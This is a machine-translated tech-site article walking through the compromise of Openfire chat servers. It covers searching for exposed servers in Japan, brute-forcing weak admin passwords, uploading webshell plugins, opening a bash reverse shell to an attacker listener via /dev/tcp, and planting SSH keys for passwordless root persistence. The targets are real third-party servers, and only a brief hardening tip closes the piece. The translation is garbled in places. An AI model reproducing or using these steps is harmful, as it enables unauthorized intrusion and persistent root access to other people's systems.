Shulou(Shulou.com)06/01 Report--

This * comes from a university task. In the process of *, it is found that opernfire is installed in the IP address field of the other party, and the server port 8080 can be accessed normally. Later, by understanding that Openfire is an open source real-time collaboration server based on Extensible Communication and presentation Protocol (XMPP) and using Java programming language. Openfire is very simple to install and use, and is managed by Web. A single server can support tens of thousands of concurrent users, which is commonly used in large enterprises. Openfire is similar to Jboss. You can also obtain Webshell by uploading the plug-in, except that the plug-in for Openfire needs to modify the code and compile it. After research and testing, as long as you have a login account, you can obtain webshell by uploading the plug-in. Generally, the permissions obtained are higher than those of the root system. Foreign servers generally give Openfire permission alone. The following is the whole process.

1. Target acquisition

(1) fofa.so website uses the search body= "Openfire, version:" & & country=JP, you can get the Openfire server that exists in Japan. As shown in figure 1.

Figure 1 search target

two。 Use violence or use a weak password to log in to the system

General weak passwords admin/admin, admin/admin888, admin/123456, if not these, please directly use burpsuite to crack the website that can be accessed normally, as shown in figure 2, openfire may open different ports.

Figure 2openfire backend login address

3. Enter the backstage

After entering the correct password, as shown in figure 3, when you enter the background, you can view server settings, users / user groups, sessions, group chats, plug-ins and other information.

Figure 3. Enter the background

4. View and upload plug-ins

Click plug-ins, where you can see a list of all plug-ins. Under upload plug-ins, click upload plug-ins, and select the specially generated openfire plug-ins with webshell, as shown in figure 4.

Figure 4 upload plug-in

In this test, even plug-ins were collected from the Internet, as shown in figure 5, and all of them were uploaded successfully.

Figure 5. Upload the plug-in with webshell

5. Get webshell

(1) helloworld plug-in acquires webshell

Click Server-Server Settings, as shown in figure 6. If the helloworld plug-in uploads and runs successfully, a user interface setting is generated under the configuration file. Click the link to get the webshel, as shown in figure 7.

Figure 6 viewing server settings

Figure 7 get webshell

(2) broadcast plug-in acquires webshell

Use the name of the url+ plugins/broadcast/webshell file to obtain:

Http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami

Http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp

It can also be obtained by address in the helloworld plug-in

Http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp

As shown in figure 8 and figure 9, get the webshell of broadcast and view that the current user right is root.

Figure 8 get the current user rights

Figure 9 get webshell

6. Login server without root password

* this should be over according to the old way of thinking, but I would like to try another way. Although we can get the / etc/shadow file through webshell, the passwords of the root and other users are obviously not so easy to crack. If ssh is used on the server, can you use public and private keys to solve the access problem?

(1) bounce back to broilers

Execute the command to bounce the server to port 8080 of the chicken server xxx.xxx.xxx.xxx, and you need to use nc to listen on port 8080 in advance, that is, to execute "nc-vv-l-p 8080" as shown in figure 10.

Figure 10 listening on port 8080

(2) rebound shell to broilers

Execute the command "bash-I > & / dev/tcp/xxx.xxx.xxx.xxx/8080 0 > & 1" to bounce back to the broiler, as shown in figure 11, to get a bounce shell.

Figure 11 rebound shell

7. Actual operation flow

(1) the remote server generates public and private keys

Execute the "ssh-keygen-t rsa" command on the * server. By default, enter three times. As shown in figure 12, id_rsa and id_rsa.pub are generated in the root/.ssh/ directory, where id_rsa is the private key of the server, especially important, and id_rsa.pub is the public key.

Figure 12 generating public and private keys on a remote server

(2) generate public and private keys on the local linux

Execute the command "ssh-keygen-t rsa" on the local linux to generate the public and private keys, download the id_rsa of the remote server to the local, execute the command "cat id_rsa > / root/.ssh/authorized_keys", and generate the private key of the remote server to the authorized_keys file.

(3) upload the local public key to the remote server and generate authorized_keys

Catid_rsa.pub > / root/.ssh/authorized_keys

(4) Delete redundant files

Rmid_rsa.pub

Rmid_rsa

(5) Log in to the server

Use "sshroot@1xx.1xx.111.1xx" to log on to the server, without entering the password of the remote server, to achieve the goal of perfect login to the server.

8 Summary

(1) Openfire needs to obtain the administrator's account number and password, and currently kills all helpers. The latest version of Openfire is 4.1.5.

(2) the admin administrator account can be violently cracked through burpsuite.

(3) using openfire security hardening, you can use a strong password and strictly set plug-in permissions. It is recommended to disable newly created directories in addition to the necessary plug-in directories.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.